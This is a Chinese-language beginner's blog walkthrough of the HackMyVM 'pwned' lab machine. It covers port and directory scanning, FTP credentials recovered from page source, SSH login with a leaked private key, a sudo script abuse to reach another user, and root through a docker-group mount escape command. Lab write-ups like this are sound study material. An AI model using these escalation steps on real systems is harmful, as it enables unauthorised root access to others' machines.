hackmyvm——pwned之docker逃逸

本文介绍了如何利用HackMyVm平台进行简单的渗透测试,步骤包括网段扫描、目录扫描、FTP登录、SSH私钥利用以及通过Docker镜像提权。作者分享了初学者在渗透过程中的实战经验和技巧。
摘要由CSDN通过智能技术生成

简介:HackMyVm是一个集合了大量靶机的平台,通过下载压缩包后导入Vm虚拟机来使用,推荐使用VirtualBox来导入加载漏洞虚拟机。类似于Vulnhub、HackTheBox,但是相比于Vulnhub而言,其文件所占空间要小的多,而且从靶机中取得的flag可以直接通过HackMyVm提交

靶机连接:HackMyVM

靶机难度:简单

目录

1.信息收集

2.目录扫描

 3.ftp登录

4.ssh私钥利用

​编辑 5.提权

总结

1.信息收集

使用nmap进行网段存活扫描 nmap -sn 192.168.29.0/24     靶机ip:192.168.29.150

对靶机进行端口 web服务扫描  nmap -sV -A -sS -p- -T4 192.168.29.150   开启了21、22、80端口先对web服务进行访问

2.目录扫描

dirsearch -u http://192.168.29.150/ --random-agent -i 200 301  对网站进行目录扫描访问robots.txt

 发现并没有什么有用的东西使用大字典在进行扫描一便,发现了hidden_text

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.29.150

 

 发现了很多路径,逐个进行访问在/pwned.vuln目录下查看源码得到了ftp账号和密码

 3.ftp登录

使用得到的账户密码进行ftp登录,在share目录下有两个文件把他get下来查看

4.ssh私钥利用

查看我们刚刚下载的文件,在id_rsa中发现ssh的私钥 note.txt中发现了账户,这里我们可以使用ssh私钥登录

 由于我们重ftp上下载的文件它默认保存的是之前的文件权限所有我们在利用的时候需要进行赋权

ssh ariana@192.168.29.150 -i id_rsa 

 在当前目录下发现了第一个flag,使用sudo -l查看一下用户和文件的权限

发现有个sh文件不需要selena用户的认证,但是这里我们无法编辑文件写shell

这里我们使用selena这个用户执行一个这个脚本  

用户名:selena

解释器:/bin/bash   进入成功后我们使用python切换到交互shell

python3 -c "import pty;pty.spawn('/bin/bash')";

 

切换到selena用户目录下查看uses2文件得到第二个flag

 5.提权

查看用户权限发现属于docker组  使用命令查看镜像 docker images

发现存在镜像这里可以使用挂载docker镜像来进行提权

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

最后成功得到root权限得到最后一个flag,至此渗透结束!!!

总结:

1.gobuster的使用扫描挺快

2.ssh私钥登录

3.docker逃逸进行提权

 后言:刚入门网安的一只小白,想把自学的学习的过程记录下来方便自己,帮助他人。可以私信博主欢迎学习交流!!! 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值